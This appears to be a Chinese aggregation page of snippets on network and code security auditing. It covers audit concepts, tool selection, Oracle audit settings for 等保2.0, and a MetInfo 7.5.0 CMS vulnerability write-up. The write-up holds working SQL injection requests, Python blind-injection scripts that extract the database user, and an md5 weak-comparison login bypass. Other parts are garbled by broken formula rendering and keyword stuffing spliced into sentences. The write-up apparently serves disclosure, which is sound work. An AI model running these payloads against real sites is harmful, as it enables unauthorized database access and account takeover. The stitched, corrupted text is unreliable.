-
2021-06-23 12:20:52
什么是网络安全审计?国际互联网络安全审计(网络备案),是为了加强和规范互联网安全技术防范工作,保障互联网网络安全和信息安全,促进互联网健康、有序发展,维护国家安全、社会秩序和公共利益。佰佰安全网看看吧。
安全审计的概念及目的
计算机网络安全审计(Audit)是指按照一定的安全策略,利用记录、系统活动和用户活动等信息,检查、审查和检验操作事件的环境及活动,从而发现系统漏洞、入侵行为或改善系统性能的过程。
也是审查评估系统安全风险并采取相应措施的一个过程。在不至于混淆情况下,简称为安全审计,实际是记录与审查用户操作计算机及网络系统活动的过程,是提高系统安全性的重要举措。系统活动包括操作系统活动和应用程序进程的活动。用户活动包括用户在操作系统和应用程序中的活动,如用户所使用的资源、使用时间、执行的操作等。安全审计对系统记录和行为进行独立的审查和估计,其主要作用和目的包括5个方面:
(1)对可能存在的潜在攻击者起到威慑和警示作用,核心是风险评估。
(2)测试系统的控制情况,及时进行调整,保证与安全策略和操作规程协调一致。
(3)对已出现的破坏事件,做出评估并提供有效的灾难恢复和追究责任的依据。
(4)对系统控制、安全策略与规程中的变更进行评价和反馈,以便修订决策和部署。
(5)协助系统管理员及时发现网络系统入侵或潜在的系统漏洞及隐患。
网络安全审计的类型
网络安全审计从审计级别上可分为3种类型:系统级审计、应用级审计和用户级审计。
1)系统级审计
系统级审计主要针对系统的登入情况、用户识别号、登入尝试的日期和具体时间、退出的日期和时间、所使用的设备、登入后运行程序等事件信息进行审查。典型的系统级审计日志还包括部分与安全无关的信息,如系统操作、费用记账和网络性能。这类审计却无法跟踪和记录应用事件,也无法提供足够的细节信息。
2)应用级审计
应用级审计主要针对的是应用程序的活动信息,如打开和关闭数据文件,读取、编辑、删除记录或字段的等特定操作,以及打印报告等。
3)用户级审计
用户级审计主要是审计用户的操作活动信息,如用户直接启动的所有命令,用户所有的鉴别和认证操作,用户所访问的文件和资源等信息。
以上是小编整理的关于网络安全审计的一些内容,如果还想继续学习
责任编辑:慕丹萍
更多相关内容 -
安全审计内容 简化版
2012-05-31 09:44:04网络层面、系统层面、应用层面、业务层面与审计相关的内容和要求。 -
代码安全审计及相关服务内容概述
2018-12-31 15:38:20。。。。。。。代码安全审计及相关服务内容概述 -
安全审计管理制度.docx
2019-12-23 12:40:48第二条 信息安全管理部门定期进行安全审计工作,应根据审计内容确定安全审计周期。 第三条 信息安全管理部门负责制定信息安全审计工作的组织方式和对审计结果的处理方法。 第四条 安全审计分为管理和技术两个... -
计算机安全保密审计报告.docx
2020-10-15 12:58:57涉密计算机安全保密审计报告 审计对象 XX计算机 审计日期 XXXX年 XX月 XX日 审计小组人员组成 姓名 XX 部门 XXX 姓名 XXX 部门 XXX 审计主要内容清单 安全策略检查 外部环境检查 管理人员检查 审计记录 安全策略检查... -
信息安全技术代码安全审计报告.pdf
2020-08-12 03:28:18附 录 A 资料性附录 代码安全审计报告 A.1 概述 本附录给出了第 5章代码安全审计过程中的审计报告的示例 A.2 报告内容 A.2.1 审计总体信息 审计总体信息应包括但不限于以下信息 a) 审计日期 b) 审计团队成员信息 c) ... -
网络安全审计
2017-08-16 10:12:04网络安全审计 -
Java安全代码审计介绍及扫描工具Fortify详解
2021-06-12 16:20:49本节课程是为后续Java代码审计课程的铺垫课程,本节课程中详细介绍了什么是Java安全代码审计、Java代码审计需要的前置知识等介绍性的内容,同时也给大家介绍了一款专门用于Java代码审计的扫描工具Fortify,该工具在... -
涉密信息安全保密审计报告.pdf
2020-09-10 00:47:37涉密计算机安全保密审计报告 审计对象 XX计算机 审计日期 XXXX年 XX月 XX 日 审计小组人员组成 姓名 XX 部门 XXX 姓名 XXX 部门 XXX 审计主要内容清单 1. 安全策略检查 2. 外部环境检查 3. 管理人员检查 审计记录 ... -
代码安全审计浅析
2019-12-25 17:31:43近些年来,随着我国社会发展和科技进步,在军事、航天、航空、能源、金融、公共安全等众多领域,国家大型关键基础设施正在向着更强、更高的水平急剧跃升,呈现出超大型化、复杂化、安全关键的特征。软件在系统中起到...近些年来,随着我国社会发展和科技进步,在军事、航天、航空、能源、金融、公共安全等众多领域,国家大型关键基础设施正在向着更强、更高的水平急剧跃升,呈现出超大型化、复杂化、安全关键的特征。软件在系统中起到核心的作用。随着软件规模的日益增大,代码数量由几万行,发展到现在经常出现几十万行,甚至几百万行代码的规模,系统的逻辑结构越来越复杂,只靠人工基本上无法满足代码审计的对于时效和成本等各方面的要求。
代码安全审计的目的通过对源代码进行审查,找出并修复代码中的各种可能影响系统安全的潜在风险,通过提高代码的自身质量,达到降低系统风险的目的。往往由于代码量大,代码安全审计一般会借助静态分析类工具,对代码进行自动检测,产生代码安全审计报告。
如果人工代码审计由人工完成,则审计质量主要是由人的技能和经验决定,不可复用和传承。当前,由于软件安全问题越来越突出,国家对软件安全问题也越重视,出台了很多软件安全相关的标准和指南,例如2019年12月1日正式执行的网络安全等级保护2.0,其中对代码安全提出了明确要求。同时对软件质量要求越来越高的前提下,与软件测试相关工作尽量左移,注重和提升代码的交付质量。在开发阶段对研发工程师每天提交的代码进行检测,及时发现和修复缺陷,成为业界和研究领域的热点。
由于软件测试技术的不断发展,以及对软件缺陷模式和安全漏洞模式的研究,促进了软件静态分析技术发展,通过对程序代码进行静态分析能够发现很多语义缺陷、运行时缺陷和安全漏洞,静态测试在软件测试中的重要性越来越突出,尤其是军工科研院所,代码规模的增加以及伴随而来的是越来越复杂的代码结构,完全依靠人工代码审查,成为制约生产效率的关键因素,采用代码自动化分析技术,能够提升开发和测试效率,减低程序风险,同时也降低了研发成本。而军工企业之外的金融、互联网、物联网、AI、无人驾驶等领域,庞大的程序代码如果依靠人工审查也是基本上无法完成的工作。等保2.0评估认证的企业,也需要强有力的代码审查工具,能够在非运行状态下全面审查代码中的安全风险,如果没有成熟的安全审计工具也基本是无法完成的任务。
那么,作为一款代码安全审计工具,应该具有什么样的功能呢?
- 首先,能够支持主流的开发语言,至少能够支持JAVA、JSP、JavaScript、Hmtl、Python、PHP网站开发主流语言和框架;
- 其次,支持尽可能多的安全检测项,尽量正确报告代码中的缺陷、漏洞和潜在的编码风险(例如bad smell),也是考察工具可用性的必要条件;
- 第三,不管是测评中心、开发团队、安全团队、代码安全审计人员,获得可编译可执行的程序代码可能性较低,因此加载任何代码都能检测,不用编译也是考察代码安全审计工具所应具备的;
- 第四,在国内使用,操作和审计报告全部是中文也是必要的。另外就是定制功能,能够根据不同的代码审计要求,选择审查范围、确定检测项也是必要的,最好能够快速定制检测项;
- 第五,目前软件开发过程中,大量引入开源组件和第三方库,能够支持对开源组件和第三方库的检测也应纳入必要条件。同时,能够快速响应客户需求,支持快速升级,能够在一定程度上减少0day漏洞的危害,也应纳入审计工具的考察范畴;
- 最后,代码安全审计也是一个新兴的业务,之前,除了军工科研院所比较重视之外,金融、互联网等企业没有引起足够的重视,对于代码安全审计到底怎么做,检测出什么结果是对的,工具漏报、误报是怎么度量的,可能不太清楚,所以需要厂商提供完整的解决方案,包括咨询服务、培训服务等;
在国内,很多企业使用开源代码检测工具作为代码安全审计工具,这虽然解决了有无问题,相对于没有这个环节,开源工具能够检测一部分缺陷和漏洞,这在一定程度上也满足了部分企业对于软件质量较低的要求。但是对于质量要求高的企业,开源检测工具的缺陷高漏报,高误报率显然无法满足对于代码质量要求高的企业。
那么代码安全审计是什么样的工作流程呢?
从上面的审计流程可以看到,代码安全审计工作的关键环节在于:
- 确定审计策略,审计策略主要考虑的是代码开发语言、架构、安全审计质量准则或出口准则、检测效率等;安全审计质量准则/出口准则需要考虑检测工具是否能够满足对检测质量要求,也就是对于检测项的覆盖,同时工具应该具有弹性扩展。
- 部署环境,主要考虑代码审计工具能够适合公司所有的物理环境,包括网络、服务器、工具兼容性等;
- 工具扫描,主要考虑代码工具的技术指标,例如工具支持的开发语言、检测精度、效率,是否支持迭检测、CI模式下检测等;
- 人工复核,主要考虑人工复核的工作量,检测结果是否容易复核。这就要求检测工具精度高、结果容易检查、误报少;
- 审计结果和报告,主要考虑的是根据需要是否能够自动产生审计结果、审计报告,报告能够根据需要求孽缘定制;检测结果和报告,中文显示,便于阅读。检测过程能够跟踪,回溯。
- 出口准则,能够根据代码审计需要制定审计范围、选择审计安全漏洞的严重程度级别。检测完成,能够判断是否满足选择的出口准则,便于快速决策。
- 开发修复,主要考虑检测结果是否便于开发人员修复、安全漏洞能够快速定位、提示信息准确、甚至能够自动进行修复或给出修复检查代码。检测精度高,误报少,漏报少,这就要求检测工具比较成熟,且得到国际公认组织的认证、认可,符合国际、国内主流标准。同时,对于开发团队确认和修复代码可以提供培训和支持。
各位,看到这里是否已经大概清楚,基于上面对代码安全审计的流程和所应具备的功能描述,你应该知道如何去选择一款静态分析工具或缺陷检测工具、代码审计工具了。但是切记国内很多所谓的代码安全审计工具只是简单的文件扫描,根本无法做到大工程跨文件的检测,只能通过特殊的正则表达式去检索潜在风险的函数、硬编码等。这样的工具虽然可以生成各种漂亮的报告,但是真正懂代码的人,会很容易发现这样的代码审计报告只能走过场,对于发现和修复代码中的潜在风险,改进代码质量是无好处的,消耗开发人员的时间排除各种误报,肯定也会得到开发团队的抵制的。下一期,我会列出主流的可以进行代码安全审计工具的对比。
(完)
关注安全 关注作者
-
某省审计厅审计数据分析网网络安全等保四级安全设计方案.doc
2021-02-20 19:43:01审计数据分析网是用来开展特定审计事项数据分析的网络,金税工程三期项目建设的重要内容。审计数据分析网的安全防护应参照等级保护第四级的标准进行设计和建设,符合相关法律法规及审计署相关政策和标准要求。 -
信息安全审计报告(完整资料).pdf
2020-09-28 07:42:42涉密计算机安全保密审计报告 审计对象xx 计算机 审计 日期xxxx 年 xx 月 xx 日 审计小组人员组成 姓名xx 审计对象xx 计算机 审计 日期xxxx 年 xx 月 xx 日 审计小组人员组成 姓名xx 部门xxx 姓名xxx 部门xxx 部门xxx... -
操作系统安全:lynic系统安全审计报告分析.docx
2022-06-01 16:27:31lynic系统安全审计报告分析 常用参数 常用参数 小技巧 如果lynis 不是通过带有man 页面的包进行安装的话,可以输入 # man ?lynis 对于那些SHELL终端背景是浅色的某些系统,可以使用 # lynis --nocolors 后者 # lynis... -
论文研究-基于内容分类技术的网络内容安全审计系统的应用 .pdf
2019-08-16 09:39:26基于内容分类技术的网络内容安全审计系统的应用,胡亮,,随着互联网的普及以及快速发展,基于互联网应用的技术要求不断提出。信息检索领域的文本分类技术已经作为一项重要的技术在互联网 -
运维安全审计堡垒机招标技术要求内容.doc
2021-09-18 11:58:37运维安全审计堡垒机招标技术要求内容.doc -
涉密计算机安全保密审计报告.pdf
2020-11-29 07:19:09账号权限安全审计记录 审计对象 审计日期 审计小组人员组成 姓名 审计主要内容清单 安全策略检查 审计情况记录 安全策略检查 完成情况 具体情况 1设置各类口令并定期更换注意系统管理员密码 是 否 2账号无上网记录... -
冰之眼安全审计系统产品白皮书
2020-03-04 03:07:40冰之眼安全审计系统(ICEYE SAS)是绿盟科技自主知识产权的安全产品,通过网络数据的采集、分析、识别,实时动态监测通信内容、网络行为和网络流量,发现和捕获各种敏感信息、违规行为,实时报警响应,全面记录网络... -
操作系统安全审计.doc
2022-06-22 18:34:211. RedHat Linux操作系统 RedHat Linux操作系统-安全审计 "测试类别: 风险评估 " "测试对象: RedHat " "测试类: 安全审计 " "测试项: " "测试内容: " "确信对系统的主要行为都有审计日志,对于重要服务(ftp ... -
网络安全审计之CMS代码审计
2021-12-29 15:45:01在table_para 函数,需要构造表单的内容使数据能传入到update_para_list或insert_para_list方法,这两个方法都可以触发sql注入,这里我选择使用insert_para_list来触发。 跟进到insert_para_list方法, f i e l d ...0x00:环境说明
Windows 10
Phpstuby
Php版本:7.2.9
CMS版本:MetInfo7.5.00x01:目录结构
|-- about |-- about1 |-- admin |-- app |-- cache |-- case |-- config |-- download |-- favicon.ico |-- feedback |-- hits |-- img |-- include |-- index.php |-- install |-- job |-- member |-- message |-- news |-- online |-- product |-- public |-- robots.txt |-- search |-- sitemap |-- tags |-- templates |-- upload
0x02:开始审计
**注意:**以下漏洞均已被CNVD收录
【一>所有资源获取<一】
1、200份很多已经买不到的绝版电子书
2、30G安全大厂内部的视频资料
3、100份src文档
4、常见安全面试题
5、ctf大赛经典题目解析
6、全套工具包
7、应急响应笔记
8、网络安全学习路线SQL注入
CMS的安装就略过了,该项目的控制器目录是app,直接从app目录下的文件开始审。
在文件 app\system\user\admin\parameter.class.php 下的 doDelParas 函数,表单的 id 被传递给了 delete_para_value 方法,跟进该方法。在文件 app/system/parameter/include/class/parameter_database.class.php 的 delete_para_value 函数可以看到传入的 id 被直接拼接到sql语句中,继续跟进到 DB::query($query)。
在文件 app/system/include/class/mysql.class.php 的 query 函数下,sql 语句被传递给了 self::$link->query 方法,跟进变量 $link 可以看到已经是 mysql对象了。
使用 burpsute 进行注入攻击,注意需要管理员权限,payload:
POST /admin/?n=user&c=parameter&a=doDelParas HTTP/1.1 Host: cms.cn Content-Length: 60 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://cms.cn Referer: http://cms.cn/admin/ Connection: close Cookie: met_auth=30ac30fgvWFY3ebf9Wgl9S6LFFBIEwlZoWl066q%2BAr%2F9CD%2Fnti7wlX15n%2BjRmGRQ0hWO6eLPsy%2BtIrVwAPyek9gY48B4; met_key=KQiciI7; id[]=164+and+if((select substr(version(),1,1))>0,sleep(1),0)
测试结果如下,成功触发基于时间的布尔盲注延时2秒,id 164是当前表默认存在的。(原谅我的厚码,大家知道就好)
编写python脚本跑出用户名
import requests url = "http://cms.cn/admin/?n=user&c=parameter&a=doDelParas" headers = {"Cookie": "met_auth=30ac30fgvWFY3ebf9Wgl9S6LFFBIEwlZoWl066q%2BAr%2F9CD%2Fnti7wlX15n%2BjRmGRQ0hWO6eLPsy%2BtIrVwAPyek9gY48B4; met_key=KQiciI7;", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"} proxies = {"http": None} req = requests.session() result = '' for mid in range(15): for i in range(30, 150): data = "id[]=164+and+if((select ascii(substr(user(),%d,1)))=%d,sleep(1),0)" % (mid, i) resp = req.post(url, data=data, headers=headers, proxies=proxies) if resp.elapsed.total_seconds() > 1.5: result += chr(i) print(result)
SQL注入
在文件 app\system\parameter\admin\parameter_admin.class.php 的 doparasave 函数下跟进 table_para 方法,table_para 方法接收了两个表单参数, M [ ‘ f o r m ’ ] 接 收 表 单 的 所 有 键 值 对 , _M[‘form’] 接收表单的所有键值对, M[‘form’]接收表单的所有键值对,_M[‘form’][‘module’] 接收表单的module参数。
在table_para 函数,需要构造表单的内容使数据能传入到update_para_list或insert_para_list方法,这两个方法都可以触发sql注入,这里我选择使用insert_para_list来触发。
跟进到insert_para_list方法, f i e l d [ ‘ o p t i o n s ’ ] 的 数 据 需 要 是 j s o n 格 式 , field[‘options’]的数据需要是json格式, field[‘options’]的数据需要是json格式,options的一个值需要是数组,使foreach之后 o p t i o n 是 数 组 , 然 后 option是数组,然后 option是数组,然后module的数据就赋值给$option[‘module’]。
进入 app\system\parameter\include\class\parameter_database.class.php 文件的add_para_value方法,可以看到 $option[‘module’] 被直接拼接到sql语句并且没有使用单引号,这里就导致了sql注入。
捋一下思路,我们需要构造 $_M[‘form’] 表单让方法能正常调用以下流程
doparasave -> table_para -> insert_para_list -> add_para_value
而 $_M[‘form’][‘module’] 表单则构造sql语句。使用 burpsute 进行注入攻击,注意需要管理员权限,payload:
POST /admin/?n=parameter&c=parameter_admin&a=doparasave HTTP/1.1 Host: cms.cn Content-Length: 126 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://cms.cn Referer: http://cms.cn/admin/ Connection: close Cookie: met_auth=30ac30fgvWFY3ebf9Wgl9S6LFFBIEwlZoWl066q%2BAr%2F9CD%2Fnti7wlX15n%2BjRmGRQ0hWO6eLPsy%2BtIrVwAPyek9gY48B4; met_key=KQiciI7; allid=a&submit_type=save&type-a=6&options-a={"0":{"0":"0"}}&module=-1 or if((select ascii(mid(user(),1,1)))>1,sleep(0.03),0)
测试结果如下,成功触发基于时间的布尔盲注延时差不多1秒。
python脚本:
import requests url = "http://cms.cn/admin/?n=parameter&c=parameter_admin&a=doparasave" headers = {"Cookie": "met_auth=30ac30fgvWFY3ebf9Wgl9S6LFFBIEwlZoWl066q%2BAr%2F9CD%2Fnti7wlX15n%2BjRmGRQ0hWO6eLPsy%2BtIrVwAPyek9gY48B4; met_key=KQiciI7;", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"} proxies = {"http": None} req = requests.session() result = '' for mid in range(15): for i in range(30, 150): data = "allid=a&submit_type=save&type-a=6&options-a={\"0\":{\"0\":\"0\"}}&module=-1 or if((select ascii(mid(user(),%d,1)))=%d,sleep(0.03),1)" % (mid, i) resp = req.post(url, data=data, headers=headers, proxies=proxies) if resp.elapsed.total_seconds() > 0.8: result += chr(i) print(result)
md5弱类型比较
在文件 app/system/user/web/login.class.php 的 dologin函数下,$this->login 方法接收了表单的username与password,跟进该方法。
在login函数中继续跟进到 $this->userclass->login_by_password 方法。
在文件 app/system/include/class/user.class.php 的 login_by_password 函数中 $user 从方法 t h i s − > g e t u s e r b y u s e r n a m e ( this->get_user_by_username( this−>getuserbyusername(username); 获取了数据库查询的会员数据。表单的password被进行了md5加密,然后与 $user[‘password’] 进行了比较,由于使用了两个等于号,所以存在md5弱类型比较漏洞。(经常打ctf的应该都知道)
漏洞复现
首先注册一个账号 abab,密码设置为md5加密后为0e开头的字符串。
登录时使用md5加密后为0e开头的字符串即可。
结语
可以发现大部分是后台的漏洞,前台防的比较紧,不过这些漏洞CNVD都是收录的。
-
安全审计产品:一项一项教你测等保2.0——Oracle安全审计
2021-05-05 02:31:11所以数据库的安全就是保障数据安全的重要屏障,现在市面上有许多数据库产品,其中使用比较广泛的就是Oracle数据库,今天我们就来讲一讲等保测评2.0中对Oracle数据库有哪些安全要求安全审计产品。Oracle数据库二、...一、前言信息系统只要运行,就会产生数据,产生数据就需要存储,数据库就是所有信息系统所必需的,数据是信息系统最重要的东西,所以数据库的安全就是保障数据安全的重要屏障,现在市面上有许多数据库产品,其中使用比较广泛的就是Oracle数据库,今天我们就来讲一讲等保测评2.0中对Oracle数据库有哪些安全要求安全审计产品。
Oracle数据库
二、测评项写到现在,其实等保2.0对于数据库的要求都是一样的,不同的是每个数据库都会有自己的实现方式,下面我们按照惯例列出等保2.0对于Oracle数据库在安全审计方面的要求安全审计产品。
a)应启用安全审计功能安全审计产品,审计覆盖到每个用户,对重要的用户行为和重要安全事件进行审计;
b)审计记录应包括事件的日期和时间、用户、事件类型、事件是否成功及其他与审计相关的信息;
c)应对审计记录进行保护安全审计产品,定期备份,避免受到未预期的删除、修改或覆盖等;
d)应对审计进程进行保护,防止未经授权的中断安全审计产品。
三、测评项aa)应启用安全审计功能安全审计产品,审计覆盖到每个用户,对重要的用户行为和重要安全事件进行审计;
Oracle数据库是自带审计功能的安全审计产品,要想查看审计功能的状态,我们可以使用语句:
select value from v$parameter where name ='audit_trail';
查看审计功能是否开启安全审计产品,如下图所示:
审计功能参数
我们可以看到安全审计产品,参数为“DB,EXTENDED”,下面是我找到的audit_trail参数的含义:
audit_trail参数有6个参数可以使用:
none:禁用数据库审计(强制审计除外)安全审计产品,为理论上的默认值;
os:将所有审核记录定向到操作系统文件安全审计产品,windows系统的话好像是会定向到事件查看器中的应用程序中(注意,其记录的值和db差不多,不包括具体的sql语句);
db:将所有审核记录定向到SYS.AUD$表(但强制审计的记录除外);
db, extended:同上安全审计产品,同时,SYS.AUD$表的SQL bind and SQL text列才会填充值,也就是说参数为db的情况下,并不会记录具体的sql语句;
xml:记录的内容和参数值为db时一致安全审计产品,同时将记录定向到xml文件中;
xml, extended:记录的内容和参数值为“db, extended”时一致,同时将记录定向到xml文件中安全审计产品。
可以看出只要参数不是none,就开启了审计功能,如果想要覆盖到每个用户的所有行为,则推荐参数值设为db, extended或者xml, extended安全审计产品。
四、测评项bb)审计记录应包括事件的日期和时间、用户、事件类型、事件是否成功及其他与审计相关的信息;
由上一项可知,当audit_trail参数设置为db, extended或者xml, extended时,审计记录包含的要素是比较全面的,在测评过程中,除了查看audit_trail参数值,最好按照实际情况,查看一下具体的日志文件安全审计产品。
五、测评项cc)应对审计记录进行保护安全审计产品,定期备份,避免受到未预期的删除、修改或覆盖等;
如果是将审计记录保存到数据库表中,那就要严格限制对该表有操作权限的用户,除此之外,审计记录还有可能存储在制定的系统文件中,比如:xml文件中,那就要看系统用户对这些文件权限设置了安全审计产品。
至于备份,最好在询问访谈之后,查看到具体的备份数据表或者文件安全审计产品。
六、测评项dd)应对审计进程进行保护,防止未经授权的中断安全审计产品。
前边我们提到了,只要将audit_trail参数的值设置成none,就可以停止审计功能,为了防止这种情况的发生,就必须知道哪些用户拥有可以修改audit_trail参数的权限,我们知道Oracle数据库用户是通过角色来获取权限的,只有用户获得了sysdba和sysoper角色,才可以拥有修改audit_trail参数的权限,因此只要查看哪些用户拥有sysdba和sysoper角色就可以了,一般只有安全管理员才可以拥有安全审计产品。
还记得查看用户权限的语句吗安全审计产品?
select * from dba_sys_privs where grantee='sys' ORDER BY GRANTEE;
这里我们依然以“sys”用户为例安全审计产品,查看sys用户所拥有的权限,如下图所示:
sys用户权限
以上就是一项一项教你测等保2.0——Oracle安全审计的所有内容,希望对大家有所帮助,欢迎关注@科技兴了解更多科技尤其是网络安全方面的资讯与知识安全审计产品。
-
如何制订IT安全审计计划
2020-03-30 01:16:12话说,自从考了CISA,看IT安全审计不再是一头雾水了,要是这句算广告,那我也认栽了。 说正事,IT系统安全审计(信息系统安全审计)不是一个新鲜事物,但是一直没有被提到很高的重视程度上来。究其原因,就好比从前... -
企业级源代码安全审计
2020-06-03 10:42:43代码审计专家服务团队,除了提供网络、现场的源代码审计服务外,为了帮助企业建立代码安全审计平台、Devops/DevSecOps平台、代码扫描基线、安全和质量编码规范、制度流程,打通企业研发的各个管理环节,实现自动化等... -
计算机安全保密审计报告
2021-07-21 00:23:501、涉密计算机安全保密审计报告涉密计算机安全保密审计报告审计对象审计对象:XX 计算机审计日期审计日期:XXXX 年 XX 月 XX 日审计小组人员组成:审计小组人员组成:姓名:XX 部门:XXX姓名:XXX 部门:XXX审计主要... -
安全审计系统可行性方案
2015-01-30 12:08:22文档为安全审计系统的可行性方案,主要论文必要性、设计内容、设备清单等等 -
信息安全技术代码安全审计报告.docx
2020-03-24 22:03:59资料性附录 代码安全审计报告 概述 本附录给出了第5章代码安全审计过程中的审计报告的示例 报告内容 审计总体信息 审计总体信息应包括但不限于以下信息 审计日期 审计团队成员信息 审计依据 审计原则 代码的信息包括... -
【Linux安全审计机制模块总体描述】
2022-03-18 17:15:12审计是事后认定违反安全规则的分析技术,安全审计为管理员在用户违反安全法则时提供及时的警告信息,实现对系统信息的追踪、审查、统计和报告等功能[1]。linux提供了用来记录系统安全事件的审计系统,审计系统包括... -
互联网金融信息安全 审计报告 审计报告.pptx
2020-09-02 10:56:38互联网金融信息安全 项目五 安全...互联网金融信息安全 目录 安全审计 5.5.4 审计报告 1 审计报告 审计报告一般可采取如表所示的表示方式 1 审计报告 完整性的审计报告应包括有安全意义的日志统计信息它能以交互式可 -
XX分公司信息安全审计管理办法.docx
2020-02-03 10:10:39河南石油分公司信息...安全审计内容分为管理和技术两个方面管理审计检 查安全管理制度的执行情况技术审计检查企业网局 域网互联网出口和各信息系统符合设备安全技术要求 安全配置要求以及其他技术规范的情况 一一一? -
区块链安全100问 | 第七篇:智能合约审计流程及审计内容
2021-08-16 10:08:12是一家专注于区块链生态安全的实战创新型网络安全企业,团队扎根区块链安全与应用技术研究,以丰富的安全攻防实战经验结合人工智能数据分析处理,为用户提供区块链安全漏洞风险检测、安全审计、安全防御、资产追溯,...